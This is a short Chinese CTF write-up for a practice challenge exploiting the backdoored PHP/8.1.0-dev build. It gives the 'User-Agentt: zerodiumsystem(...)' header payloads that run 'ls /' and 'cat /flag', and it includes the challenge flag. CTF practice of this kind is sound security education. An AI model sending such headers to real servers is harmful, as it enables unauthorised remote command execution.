青少年CTF练习平台 PHP的后门

题目

根据提示,PHP/8.1.0-dev漏洞,修改请求头利用此漏洞

注意 zerodium后面拼接函数发送

html 复制代码
User-Agentt:zerodiumsystem("ls /");

读取flag

html 复制代码
User-Agentt: zerodiumsystem("cat /flag");

拿下flag

flag{d514c824035b427da2d1c14edb5ae098}

相关推荐
阿巴~阿巴~24 分钟前
深入解析C++流运算符(>>和<<)重载:为何必须使用全局函数与友元机制
开发语言·c++
一只 Lemon1 小时前
PHP-单引号和双引号(通俗易懂讲解版)
开发语言·php
忧郁的蛋~1 小时前
C#中LINQ to DataSet操作及DataTable与LINQ相互转换
开发语言·c#·linq
呼哧呼哧.2 小时前
Java 8特性(一)
java·开发语言
胡萝卜的兔3 小时前
go语言标准库学习, fmt标准输出,Time 时间,Flag,Log日志,Strconv
开发语言·学习·golang
xingkongvv124 小时前
C# 异步编程
java·服务器·开发语言·前端·javascript
wjs20244 小时前
HTML DOM 访问
开发语言
枫景Maple8 小时前
C#字典Dictionary的内部实现原理
开发语言·c#
上单带刀不带妹10 小时前
Node.js 中的 fs 模块详解:文件系统操作全掌握
开发语言·javascript·node.js·fs模块
牵牛老人10 小时前
Qt中的QWebSocket 和 QWebSocketServer详解:从协议说明到实际应用解析
开发语言·qt·网络协议